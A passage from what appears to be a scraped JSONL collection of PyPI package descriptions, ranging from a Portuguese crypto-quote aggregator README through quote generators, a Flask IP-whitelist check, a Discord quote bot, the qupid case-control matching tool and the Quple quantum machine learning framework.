HTTP API e por conta disso,\npoderia ser bloqueado ou ter requisi\u00e7\u00f5es recusadas, al\u00e9m de receber dados desnecess\u00e1rios. 
Por conta disso,\nutilizei websockets API, dessa forma basta inscrever-se no canal para receber a atualiza\u00e7\u00e3o das moedas.Uso de bibliotecas asyncioO programa demanda muito IO (receber os dados da API, salva-los), por isso, optei por utilizar bibliotecas\nass\u00edncronas para isso, dessa forma o programa n\u00e3o \u00e9 bloqueado enquanto a recebimento ou envio de dados.Utiliza\u00e7\u00e3o do prodictPara facilitar a leitura do c\u00f3digo, utilizei uma classe que se comporta como um dicion\u00e1rio, por\u00e9m deixa os\natributos mais leg\u00edveis e funcionalidade de autocomplete.Objeto candle n\u00e3o contem a currency_idUma estrat\u00e9gia poss\u00edvel, seria utilizar outra chave do candle contendo o \u2018id\u2019 da moeda, por\u00e9m ao utiliza-lo seria\nnecess\u00e1rio iterar, no pior caso, sobre toda a lista, ou seja, O(n). Utilizando um dicion\u00e1rio que se comporta como\num HashMap a complexidade de tempo cai paraO(1) no caso m\u00e9dio, ou seja, a complexidade de tempo para encontrar os candles \u00e9 O(1).N\u00e3o Utiliza\u00e7\u00e3o de ORMTamb\u00e9m seria poss\u00edvel utilizar um ORM para facilitar a intera\u00e7\u00e3o com o banco de dados, por\u00e9m optei por utilizar\nconsultas SQL para demonstrar os meus conhecimentos em SQL (Mesmo que, nessa prova, apenas consultas simples s\u00e3o\nnecess\u00e1rias).FuncionamentoApos se inscrever no canal Ticker Data \u00e9 recebido a atualiza\u00e7\u00e3o do valor das moedas, este valor \u00e9 processado e a partir\ndele \u00e9 criado um objeto chave-valor que contem uma lista de 3 candles de 1 5, 10 minutos respetivamente, ent\u00e3o estes\ncandles recebem atualiza\u00e7\u00e3o constantemente, at\u00e9 que o per\u00edodo do candle se encerre e ele seja salvo e os seus atributos\nsobrescritos.ResultadosOs candles gerados podem ser encontrados atrav\u00e9s do banco de dados dispon\u00edvel na porta34807da sua maquina. Al\u00e9m\ndisso, o programa gera logs vis\u00edveis no stdout do docker.Dificuldades (Resolvidas)Como nunca havia testado m\u00e9todos ass\u00edncronos ainda, foi dif\u00edcil entender como faze-lo.Ao criar a tabela, utilizei float para os campos, e n\u00e3o comportava o tamanho de alguns valores recebidos, mudei para\nDECIMAL, que inclusive \u00e9 mais adequado para valores monet\u00e1rios por problemas de arredondamento em outros tipos de\ndados.Por desconhecer o modulo aiomysql, cometi o erro de n\u00e3o fazer o commit na transa\u00e7\u00e3o do banco de dados, e por isso, os\ndados n\u00e3o eram salvos. Para corrigir habilitei o autocommit na chamada.Tentei algumas abordagens para saber quando salvar o candle, uma delas deixava os valores de abertura-fechamento\nerrado, pois ele considerava o valor pertencente ao per\u00edodo como valor inicial, sendo que o valor do final de um deve\nser igual ao inicial do outro, al\u00e9m disso, o candle de 1 minuto estava sendo atualizado a cada 2 minutos, pois eu\nutilizei o modulo de 2 ao inv\u00e9s do de 1, porque todo numero dividido por um tem resto 0, ent\u00e3o ele salvaria o candle\nantes de o minuto ser finalizado. 
A solu\u00e7\u00e3o foi junto ao modulo, verificar se o tempo do candle atual era diferente do\nnovo valor recebido.Observa\u00e7\u00e3o importanteUm dos criterios da avalia\u00e7\u00e3o \u00e9 o formato de distribui\u00e7\u00e3o, e tendo em vista que o programa \u00e9 uma biblioteca que ao\nchamar \u00e9 sempre executada (N\u00e3o dando espa\u00e7o para que outro script consuma qualquer parte do mesmo), o programa \u00e9\ndistribuido atrav\u00e9s de um \"executavel\" hospedado no The Python Package Index (PyPi)\n.Link aquiPara executa-lo fa\u00e7a (fora do projeto):pipenvinstallquotesaggregator\npipenvshellexportQUOTESAGGREGATOR_DB_HOST=localhostexportQUOTESAGGREGATOR_DB_PORT=3306exportQUOTESAGGREGATOR_DB_USER=adminexportQUOTESAGGREGATOR_DB_PASSWORD=adminexportQUOTESAGGREGATOR_DB_NAME=quotes\n\nagregator-runLembre-se que o container do MySQL deve estar rodando ou tamb\u00e9m \u00e9 poss\u00edvel usar outro banco MySQL desde que ele possua a\ntabela (comando de cria\u00e7\u00e3o emdb-init/init.sql)."} +{"package": "quotes-api", "pacakge-description": "No description available on PyPI."} +{"package": "quotescli", "pacakge-description": "QuotesPyQuotesPy is an open source program that displays a random quote from a celebritie as a notificationinstallationbuild from source :git clone https://github.com/0RaMsY0/QuotesPy\n cd QuotesPy\n python setup.pyinstall using pip :pip install quotescliUsageargumentsArguments formusage-h--helpshow help-sn--search-by-namesearch for the quote of someone by his name-st--search-by-topicsearch for the quote of a topic-T--Topicdisplay all the availables Topics-t--timeset a time to display the quote-pr--print-quoteprint the quote into the console (in default it will be shown as a notification)Examples :- search by name (-sn).- search by Topic (-st)- this is how the quote well be displaied (as a notification) if the -pr is not used- the diferents Topics that you can search for quote about them (use -T to diplay them)ressoursesQuotesPy useshttps://www.brainyquote.com/to scrape search resultes and displays it to the user\nby a notification or directly to the terminal"} +{"package": "quotes-fetcher", "pacakge-description": "No description available on PyPI."} +{"package": "quotes-generator", "pacakge-description": "Quotes-GeneratorHaving all type of quotes ! . 
Best Quotes of IT legend peoples.Easy to useTechnologyPython :-Pythonis an interpreted, high-level and general-purpose programming language.Requests :- Therequestsmodule allows you to send HTTP requests using Python.BeautifulSoup :-Beautiful Soupis a Python library for pulling data out of HTML and XML files.INSTALLATION$ pip installquotes_generatorWORKINGimportquotes_generatorTo get Motivational's quotesquote = quotes_generator.motivational_quotes() \nprint(quote)To get Albert Einstein's quotesquote = quotes_generator.albert_einstein_quotes() \nprint(quote)To get Mahatma Gandhi's quotesquote = quotes_generator.mahatma_gandhi_quotes() \nprint(quote)To get Steve Jobs's quotesquote = quotes_generator.steve_jobs_quotes() \nprint(quote)To get Bill Gates's quotesquote = quotes_generator.bill_gates_quotes() \nprint(quote)To get Elon Musk's quotesquote = quotes_generator.elon_musk_quotes() \nprint(quote)To get Mark Zuckerberg's quotesquote = quotes_generator.mark_zuckerberg_quotes() \nprint(quote)License"} +{"package": "quotesgeneratorapi-wrapper", "pacakge-description": "quotes-generator-api."} +{"package": "quotespy", "pacakge-description": "quotespyPython library to create quotes/lyrics and tweet graphics with PILIt can be installed through pip usingpip install quotespy.UsageQuotes/Lyrics GraphicsCreate a graphic (.png) for lyrics, with default setings, saved in the current directory:importquotespy.graphics.graphicsasggraphic_info={\"title\":\"strange_days\",\"text\":\"Say goodbye to the silence, we can dance to the sirens\"}g.create_graphic(graphic_info,{},default_settings_format=\"lyrics\")I encourage you to also try out the \"quote\"default_settings_formatoption.Alternatively, you can specify custom graphic settings and omit default settings options (note custom settings are chosen over default settings if both are specified).importquotespy.graphics.graphicsasggraphic_info={\"title\":\"strange_days\",\"text\":\"Say goodbye to the silence, we can dance to the sirens\"}custom_settings={\"font_family\":\"arial.ttf\",\"font_size\":250,\"size\":[2800,2800],\"color_scheme\":[\"#000\",\"#fff\"],\"wrap_limit\":20,\"margin_bottom\":0}save_dir=\"some_path\"g.create_graphic(graphic_info,custom_settings,save_dir=save_dir)Plus, in this second example, the path in which to save the created graphic is also specified.Please note all fields/keys shown forgraphic_infoand forcustom_settingsin the examples are always required.If you have a .txt or .json file with multiple lyrics/quotes, you can also load it and create individual graphics with a single function, just specify the path to the source file and the graphic settings (either custom or a default format).importquotespy.graphics.graphicsasgg.gen_graphics(\"samples\\\\lyrics.txt\",{},default_settings_format=\"lyrics\",save_dir=\"some_path\")For more information on the text formatting required from these .txt and .json source files, please refer to thesamplesfolder in this repository. It contains example files.Tweet GraphicsTweet graphics works largely the same as thegraphicscounterpart. 
The biggest difference is that it uses a different module, and the dictionaries require a couple of additional fields.Starting with the most basic usage:importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}t.create_tweet(tweet_info,{},default_settings_format=\"blue\",save_dir=\"some_path\")Just like the other module has its own default settings formats, for tweets there are three options, which differ mostly in the color scheme: \"blue\", \"light\" and \"dark\".That \"user_pic\" key's value in thetweet_infodictionary can either be a path to a .png file, or it can be left as an empty string. In other words, having a profile picture in the graphic is optional, but the dicitonary must always have the key. Also, note that the picture is pre-processed by reducing its dimensions to 10% of the graphic's dimensions, with a circular crop.If you want to use custom graphic settings, you can use the following example for reference:importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":100,\"font_size_header\":80,\"size\":[1800,1800],\"color_scheme\":[\"#000000\",\"#ffffff\"],\"wrap_limit\":32,\"margin_bottom\":30}t.create_tweet(tweet_info,graphic_settings)And, just like for thecreate_graphicsmodule, you can also bulk generate tweet graphics, but this time only from .json source files:importquotespy.tweet_graphics.tweet_graphicsastt.gen_tweets(\"samples\\\\tweets.json\",{},default_settings_format=\"dark\")New in v1.2: transparent backgroundsStarting in version 1.2, quotespy now accepts RGBA color strings to create transparent backgrounds. The red, green and blue channels are integers between 0 and 255, the alpha/transparency value is a float between 0 and 1.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":100,\"font_size_header\":80,\"size\":[1800,1800],\"color_scheme\":[\"rgba(255, 255, 255, 0)\",\"#ffffff\"],\"wrap_limit\":32,\"margin_bottom\":30}t.create_tweet(tweet_info,graphic_settings)Alternatively,Nonecan be passed as the background color to create a transparent background. These new color options are available for bothtweet_graphicsandgraphics.New in v1.3 (tweet_graphics): custom profile picture sizeStarting with quotespy 1.3, it is possible to speficify the dimensions for which the profile picture will be cropped. 
By default, the picture is cropped to be one tenth of the graphic's width and height.In the following example, the profile picture will be cropped to the 120x120 size, as specified by theprofile_pic_sizekey in thegraphic_settings.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":40,\"font_size_header\":25,\"size\":[700,700],\"profile_pic_size\":[40,40],\"color_scheme\":[\"#fff\",\"#000\"],\"wrap_limit\":32,\"margin_bottom\":20}t.create_tweet(tweet_info,graphic_settings)However, if you want to stick with the default cropping dimensions, then you can pass twoNones inside theprofile_pic_sizelist. This is shown in the following example.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":40,\"font_size_header\":25,\"size\":[700,700],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#fff\",\"#000\"],\"wrap_limit\":32,\"margin_bottom\":20}t.create_tweet(tweet_info,graphic_settings)Caveats for the custom profile picture size:The picture is not vertically aligned in the header;The width and the height must use the same value (that is, it must be a square).Real Example UsageLastly, I'd like to you show some \"advanced\" usage of thistweet_graphicsmodule (hopefully it serves as inspiration for thegraphicsmodule as well):importquotespy.tweet_graphics.tweet_graphicsastimportosSAVEDIR=\"imgs\"USERNAME=\"Jos\u00c3\u00a9 Fernando Costa\"USERTAG=\"@ze1598\"# List of `tweet_info` dictionariestweets=[{\"tweet_name\":\"compare_to_others_sometimes\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"Compare yourself to others once in a while (using a reasonable scale!). If you completely isolate yourself you will end up working aimlessly without ever knowing when it is enough or how much you've improved.\"},{\"tweet_name\":\"merit_in_positives\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"There is merit in talking about the positive aspects of terrible situations. It helps those going through the experience to see a glimpse of light at the end of the tunnel and it may help others who go through the same experience in the future.\"},{\"tweet_name\":\"write_down_ideas\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"Write down ideas that pop up in your head in a reliable place (note-taking app, physical notebook, etc.). 
We often come up with the ideas or inspiration we are looking for when we least expect it, but it's easy to let them escape.\"}]# Get all the titles (tweet names) from the previous listtitles=[tweet[\"tweet_name\"]fortweetintweets]# Directory in which to save graphicsPATH=\"some_path\"# Create custom light and dark mode settings# With `None` for the profile picture size it will default to be resized to one tenth of the graphic's sizes_light={\"font_family\":\"arial.ttf\",\"font_size_text\":80,\"font_size_header\":70,\"size\":[1800,1800],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#ffffff\",\"#000000\"],\"wrap_limit\":36,\"margin_bottom\":30}s_dark={\"font_family\":\"arial.ttf\",\"font_size_text\":80,\"font_size_header\":70,\"size\":[1800,1800],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#000000\",\"#ffffff\"],\"wrap_limit\":36,\"margin_bottom\":30}# Create a graphic for each `tweet_info` in the listfortweetintweets:tweet_name=tweet[\"tweet_name\"]# Each tweet is stored in its own foldertweet_path=os.path.join(PATH,tweet_name)os.system(f\"mkdir{PATH}\\\\{tweet_name}\")# And each folder has light and dark mode versions of the tweett.create_tweet(tweet,s_light,save_dir=tweet_path)tweet[\"tweet_name\"]=tweet_name+\"_DM\"t.create_tweet(tweet,s_dark,save_dir=tweet_path)"} +{"package": "quotes_scraper", "pacakge-description": "UNKNOWN"} +{"package": "quotes-wrapper", "pacakge-description": "No description available on PyPI."} +{"package": "quotesx", "pacakge-description": "What is QUOTESX?QUOTESX is basically a simple package to get quotes from, it is very simple and effiecient to use, only one line of code will get you a quote!Install GetquotesxSimply install it from pypi.org(https://pypi.org/project/quotesx/), then type from quotesx import quotesxgetQuote() functionThe getQuote function is a simple function that will return a quote, this won't print the quote so you will have to save it to a variable later and then print it.getQuote()This will return a quote, it won't print it, to do that first save the quotequote = getQuote()This will save the quote in the 'quote variable', now you can do anything that you want with thatto print it, just add the print command."} +{"package": "quotexpy", "pacakge-description": "\ud83d\udcc8 QuotexPy is a library to easily interact with qxbroker.Installing\ud83d\udcc8 QuotexPy is tested on Ubuntu 18.04 and Windows 10 withPython >= 3.10, <= 3.12.pipinstallquotexpyIf you plan to code and make changes, clone and install it locally.gitclonehttps://github.com/SantiiRepair/quotexpy.git\npipinstall-e.ImportfromquotexpyimportQuotexExamplesFor examples check outsomefound in theexampledirectory.DonationsIf you feel like showing your love and/or appreciation for this project, then how about shouting us a coffee ;)AcknowledgementsThanks to@cleitonleonelfor the initial base implementation of the project \ud83d\udd25Thanks to@ricardospinozafor solving thetradeerror in the code \ud83d\ude80NoticeThis project is a clone of theoriginalproject, because the original project was discontinued, I updated it with the help ofcollaboratorsin the community so that it is accessible to everyone."} +{"package": "quotient-security-check", "pacakge-description": "Check Whitelisted IPThis is a simple security package to check whether client IP is allowed to access the flask`s backend APIs.Before every endpoint is served, it will check for the remote IP if it exists in the list of white listed IPs, it it exists, it returns the response otherwise throws abort error:HTTPErr: 403 
AbortSetupfromflaskimportFlaskfromsecurity.check_ipimportIPCheck# Initialize the Flask appapp=Flask(__name__)# import IP_list from the config file or declare it hereip_list=<>ipcheck=IPCheck(app,ip_list)Nginx RoutingBy default headers of the incoming request gets updated with localhost IP when it is passed to the backend Nginx server.\nIn order to get the real IP of the client/LAN, we need to do following configurations in the nginx config:server {\n real_ip_recursive on;\n}\n\nlocation / {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $remote_addr;\n proxy_set_header X-Forwarded-Host $remote_addr;\n }sample incoming request header dict after naking above changes in Nginx{'wsgi.version': (1, 0), 'wsgi.url_scheme': 'http', \n'wsgi.input': '<_io.BufferedReader name=5>', 'wsgi.errors': <_io.TextIOWrapper name='' mode='w' encoding='UTF-8'>,\n'wsgi.multithread': True, \n'wsgi.multiprocess': False, 'wsgi.run_once': False, \n'werkzeug.server.shutdown': .shutdown_server at 0x7fba5d1bd598>, \n'SERVER_SOFTWARE': 'Werkzeug/0.14.1', 'REQUEST_METHOD': 'GET', 'SCRIPT_NAME': '', 'PATH_INFO': '/', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': 39534, 'SERVER_NAME': '127.0.0.1', 'SERVER_PORT': '8002', 'SERVER_PROTOCOL': 'HTTP/1.0', \n'HTTP_HOST': '172.30.1.23', \n'HTTP_X_REAL_IP': '10.21.120.11', \n'HTTP_X_FORWARDED_FOR': '10.21.120.11', \n'HTTP_X_FORWARDED_HOST': '10.21.120.11', \n'HTTP_CONNECTION': 'close', 'HTTP_PRAGMA': 'no-cache', \n'HTTP_CACHE_CONTROL': 'no-cache', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', \n'HTTP_USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36', \nHTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', \n'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'en-GB,en-US;q=0.9,en;q=0.8', 'werkzeug.request': }"} +{"package": "quotly", "pacakge-description": "QuotlyA quoting bot for 'Discord Hack Week'.Install & UsageUsing pip:pip install quotlyTo tell quotly to use your discord-bot token type:python -m quotly --token=''To start quotly type:python -m quotly --runYour discord-bot token is stored inside an.envfile inside your working directory.\nThe quotes are stored inside a SQLite database which is also placed in the current working directory.CommandsAdd new quote:!quotly-add \"\" After adding the quote to database, the command-call is deleted from channel and the user\nreceives a dm with a confirmation that the quote was added.Get random quote:!quotly-getGet random quote from specific author:!quotly-get Planned FeaturesMention discord users in quoteCommand for getting a specific quoteWeb-interfaceLicenseMIT"} +{"package": "quotool", "pacakge-description": "usagehis_quo(code, startdate=None, enddate=None, num=180, is_index=False)\nlast_quo(code, is_index=False, exchange='sh')"} +{"package": "quovo", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-analytics", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-base", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-base-slim", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-db", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-loaders", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-sync", 
"pacakge-description": "No description available on PyPI."} +{"package": "qupid", "pacakge-description": "Qupid(Pronounced like cupid)Qupid is a tool for generating and statistically evaluatingmultiplecase-control matchings of microbiome data.InstallationYou can install the most up-to-date version of Qupid from PyPi using the following command:pip install qupidQuickstartQupid provides a convenience function,shuffle, to easily generate multiple matches based on matching critiera.\nThis block of code will determine each viable control per case and randomly pick 10 arrangments of a single case matched to a single valid control.\nThe output is a pandas DataFrame where the rows are case names and each column represents a valid mapping of case to control.frompkg_resourcesimportresource_filenameimportpandasaspdimportqupidmetadata_fpath=resource_filename(\"qupid\",\"tests/data/asd.tsv\")metadata=pd.read_table(metadata_fpath,sep=\"\\t\",index_col=0)asd_str=\"Diagnosed by a medical professional (doctor, physician assistant)\"no_asd_str=\"I do not have this condition\"background=metadata.query(\"asd == @no_asd_str\")focus=metadata.query(\"asd == @asd_str\")matches=qupid.shuffle(focus=focus,background=background,categories=[\"sex\",\"age_years\"],tolerance_map={\"age_years\":10},iterations=100)TutorialThere are three primary steps to the Qupid workflow:Match each case to all valid controlsGenerate multiple one-to-one matchingsEvaluate the statistical differences between cases and controls for all matchingsTo match each case to all valid controls, we need to first establish matching criteria.\nQupid allows matching by both categorical metadata (exact matches) and continuous metadata (matching within provided tolerance).\nYou can match on either a single metadata column or based on multiple.In Qupid, the cases to be matched are referred to as the \"focus\" set, while the set of all possible controls is called the \"background\".\nFor this tutorial we will be used data from the American Gut Project to match cases to controls in samples from people with autism.First, we'll load in the provided example metadata and separate it into the focus (samples from people with autism) and the background (samples from people who do not have autism).Loading datafrompkg_resourcesimportresource_filenameimportpandasaspdmetadata_fpath=resource_filename(\"qupid\",\"tests/data/asd.tsv\")metadata=pd.read_table(metadata_fpath,sep=\"\\t\",index_col=0)# Designate focus samplesasd_str=\"Diagnosed by a medical professional (doctor, physician assistant)\"no_asd_str=\"I do not have this condition\"background=metadata.query(\"asd == @no_asd_str\")focus=metadata.query(\"asd == @asd_str\")Matching each case to all possible controlsNext, we want to perform case-control matching on sex and age.\nSex is a discrete factor, so Qupid will attempt to find exact matches (e.g. male to male, female to female).\nHowever, age is a continuous factor; as a result, we should provide a tolerance value (e.g. 
match within 10 years).\nWe use thematch_by_multiplefunction to match based on more than one metadata category.fromqupidimportmatch_by_multiplecm=match_by_multiple(focus=focus,background=background,categories=[\"sex\",\"age_years\"],tolerance_map={\"age_years\":10})This creates aCaseMatchOneToManyobject where each case is matched to each possible control.\nYou can view the underlying matches as a dictionary withcm.case_control_map.Generating mappings from each case to a single controlWhat we now want is to match each case to asinglecontrol so we can perform downstream analysis.\nHowever, we havea lotof possible controls.\nWe can easily see how many cases and possible controls we have.print(len(cm.cases),len(cm.controls))This tells us that we have 45 cases and 1785 possible controls.\nBecause of this, there are many possible sets of valid matchings of each case to a single control.\nWe can use Qupid to generate many such cases.results=cm.create_matched_pairs(iterations=100)This creates aCaseMatchCollectiondata structure that contains 100CaseMatchOneToOneinstances.\nEachCaseMatchOneToOneentry maps each case toa single controlrather than all possible controls.\nWe can verify that each entry has exactly 45 cases and 45 controls.print(len(results[0].cases),len(results[0].controls))Qupid provides a convenience method to convert aCaseMatchCollectionobject into a pandas DataFrame.\nThe DataFrame index corresponds to the cases, while each column represents a distinct set of matching controls.\nThe value in a cell represents a matching control to the row's case.results_df=results.to_dataframe()results_df.head()0 1 ... 98 99\ncase_id ...\nS10317.000026181 S10317.000033804 S10317.000069086 ... S10317.000108605 S10317.000076381\nS10317.000071491 S10317.000155409 S10317.000103912 ... S10317.000099277 S10317.000036401\nS10317.000029293 S10317.000069676 S10317.X00175749 ... S10317.000069299 S10317.000066846\nS10317.000067638 S10317.X00179103 S10317.000052409 ... S10317.000067511 S10317.000067601\nS10317.000067637 S10317.000067747 S10317.000098161 ... S10317.000017116 S10317.000067997\n\n[5 rows x 100 columns]Statistical assessment of matchingsOnce we have this list of matchings, we want to determine how statistically difference cases are from controls based on some values.\nQupid supports two types of statistical tests: univariate and multivariate.\nUnivariate data is in the form of a vector where each case and control has a single value.\nThis can be alpha diversity, log-ratios, etc.\nMultivariate data is in the form of a distance matrix where each entry is the pairwise distance between two samples, e.g. 
from beta diversity analysis.\nWe will generate random data for this tutorial where there exists a small difference between ASD samples and non-ASD samples.importnumpyasnprng=np.random.default_rng()asd_mean=4ctrl_mean=3.75num_cases=len(cm.cases)num_ctrls=len(cm.controls)asd_values=rng.normal(asd_mean,1,size=num_cases)ctrl_values=rng.normal(ctrl_mean,1,size=num_ctrls)asd_values=pd.Series(asd_values,index=focus.index)ctrl_values=pd.Series(ctrl_values,index=background.index)sample_values=pd.concat([asd_values,ctrl_values])We can now evaluate a t-test between case values and control values for each possible case-control matching in our collection.fromqupid.statsimportbulk_univariate_testtest_results=bulk_univariate_test(casematches=results,values=sample_values,test=\"t\")This returns a DataFrame of test results sorted by descending test statistic.method_name test_statistic_name test_statistic p-value sample_size number_of_groups\n15 t-test t 3.900874 0.000187 90 2\n61 t-test t 3.770914 0.000294 90 2\n50 t-test t 3.536803 0.000649 90 2\n32 t-test t 3.395298 0.001030 90 2\n68 t-test t 3.310822 0.001350 90 2\n.. ... ... ... ... ... ...\n13 t-test t 0.645694 0.520158 90 2\n49 t-test t 0.555063 0.580260 90 2\n92 t-test t 0.409252 0.683349 90 2\n51 t-test t 0.110707 0.912101 90 2\n34 t-test t 0.048571 0.961371 90 2\n\n[100 rows x 6 columns]From this table, we can see that iteration 15 best separates cases from controls based on our random data.\nConversely, iteration 34 showed essentially no difference between cases and controls.\nThis shows that it is important to create multiple matchings as some of them are better than others.\nWe can plot the distribution of p-values to get a sense of the overall distribution.importmatplotlib.pyplotaspltimportseabornassnssns.histplot(test_results[\"p-value\"])We see that most of the p-values are near zero which makes sense because we simulated our data with a difference between ASD and non-ASD samples.Saving and loading qupid resultsQupid allows the saving and loading of bothCaseMatchandCaseMatchCollectionobjects.CaseMatchOneToManyandCaseMatchOneToOneobjects are saved as JSON files whileCaseMatchCollectionobjects are saved as pandas DataFrames.fromqupid.casematchimportCaseMatchOneToMany,CaseMatchOneToOne,CaseMatchCollectioncm.save(\"asd_matches.one_to_many.json\")# Save all possible matchesresults.save(\"asd_matches.100.tsv\")# Save all 100 iterationsresults[15].save(\"asd_matches.best.json\")# Save best matchingCaseMatchOneToMany.load(\"asd_matches.one_to_many.json\")CaseMatchCollection.load(\"asd_matches.100.tsv\")CaseMatchOneToOne.load(\"asd_matches.best.json\")Command Line InterfaceQupid has a command line interface to create multiple matchings from cases and possible controls.\nIf providing numeric categories, the column name must be accompanied by the tolerance after a space (e.g.age_years 5for a tolerance of 5 years).\nYou can pass multiple options to--discrete-cator--numeric-catto specify multiple matching criteria.For usage detalls, usequpid shuffle --help.qupid shuffle \\\n --focus focus.tsv \\\n --background background.tsv \\\n --iterations 15 \\\n --discrete-cat sex \\\n --discrete-cat race \\\n --numeric-cat age_years 5 \\\n --numeric-cat weight_lbs 10 \\\n --output matches.tsvQIIME 2 UsageQupid provides support for the popular QIIME 2 framework of microbiome data analysis.\nWe assume in this tutorial that you are familiar with using QIIME 2 on the command line.\nIf not, we recommend you read the excellentdocumentationbefore you get started with 
Qupid.Runqiime qupid --helpto see all possible commands.Matching one-to-manyUseqiime qupid match-one-to-manyto match each case to all possible controls.\nNote that for numeric categories, you must pass in tolerances in the form of+-.qiime qupid match-one-to-many \\\n --m-sample-metadata-file metadata.tsv \\\n --p-case-control-column case_control \\\n --p-categories sex age_years \\\n --p-case-identifier case \\\n --p-tolerances age_years+-10 \\\n --o-case-match-one-to-many cm_one_to_many.qzaMatching one-to-oneWith a one-to-many match, you can generate multiple possible one-to-one matches usingqiime qupid match-one-to-one.qiime qupid match-one-to-one \\\n --i-case-match-one-to-many cm_one_to_many.qza \\\n --p-iterations 10 \\\n --o-case-match-collection cm_collection.qzaQupid shuffleThe previous two commands can be run sequentially usingqiime qupid shuffle.qiime qupid shuffle \\\n --m-sample-metadata-file metadata.tsv \\\n --p-case-control-column case_control \\\n --p-categories sex age_years \\\n --p-case-identifier case \\\n --p-tolerances age_years+-10 \\\n --p-iterations 10 \\\n --output-dir shuffleStatistical assessment of matchesYou can assess how different cases are from controls using both univariate data (such as alpha diversity) or multivariate data (distance matrices).\nThe result will be a histogram of p-values from either a t-test (univariate) or PERMANOVA (multivariate) comparing cases to controls.\nNote that for either command, the input data must contain values for all possible cases and controls.qiime qupid assess-matches-univariate \\\n --i-case-match-collection cm_collection.qza \\\n --m-data-file data.tsv \\\n --m-data-column faith_pd \\\n --o-visualization univariate_p_values.qzvqiime qupid assess-matches-multivariate \\\n --i-case-match-collection cm_collection.qza \\\n --i-distance-matrix uw_unifrac_distance_matrix.qza \\\n --p-permutations 999 \\\n --o-visualization multivariate_p_values.qzvHelp with QupidIf you encounter a bug in Qupid, please post a GitHub issue and we will get to it as soon as we can. We welcome any ideas or documentation updates/fixes so please submit an issue and/or a pull request if you have thoughts on making Qupid better."} +{"package": "quple", "pacakge-description": "Quple is a framework for quantum machine learning based on the GoogleCirqandTensorFlow Quantumlibraries. It contains implementation of a wide range of quantum machine learning algorithms, including:Variational Quantum Classifier (VQC)Quantum Support Vector Machine (QSVM)Quantum Convolutional Neural Network (QCNN)Quantum Generative Adversarial Network (QGAN)Quple was originally developed for applications in high energy physics (HEP) analyses. The letter \"Q\" refers to the use of quantum computational methods in this framework. The homophone to the word \"couple\" references the concept in HEP which refers to the interaction between two objects - machine learning and high energy physics in this case.Quple started as a Google Summer of Code (GSoC) project in 2020 and 2021 for theML4Sciumbrella organization. 
References to related projects can be found in the descriptions below.Installing the packageTo install the current release, simply dopip install qupleTutorialsFor GSoC 2020:Tutorial-01 Quantum CircuitTutorial-02 Parameterised Quantum Circuit (PQC)Tutorial-03 Interaction GraphsTutorial-04 Encoding FunctionTutorial-05 Encoding CircuitTutorial-06 Variational CircuitTutorial-07 Circuit DescriptorsTutorial-08 Variational Quantum ClassifierFor GSoC 2021:Tutorial-09 Parameterized Quantum Circuit (PQC) layerTutorial-10 Quantum Convolution 2D (QConv2D) layerTutorial-11 Quantum Generative Adversarial Network (QGAN)Advanced Tutorial-01 QGAN High Energy Physics ApplicationGSoC 2020 : QupleThe project archive can be foundhere.For documentation and report, please checkhere.GSoC 2021 : Quple - Quantum GANThe proposed projectQuple - Quantum GANserves as an extension to the 2020 GSoC project with a major focus on the implementation of Quantum Generative Adversarial Networks (QGAN).In this project, two major concepts are developed:Quantum convolution using quantum filters (QFilter)Quantum image generation and discrimination based on quantum convolutionQuantum Convolution using Quantum FiltersRelevant tutorial 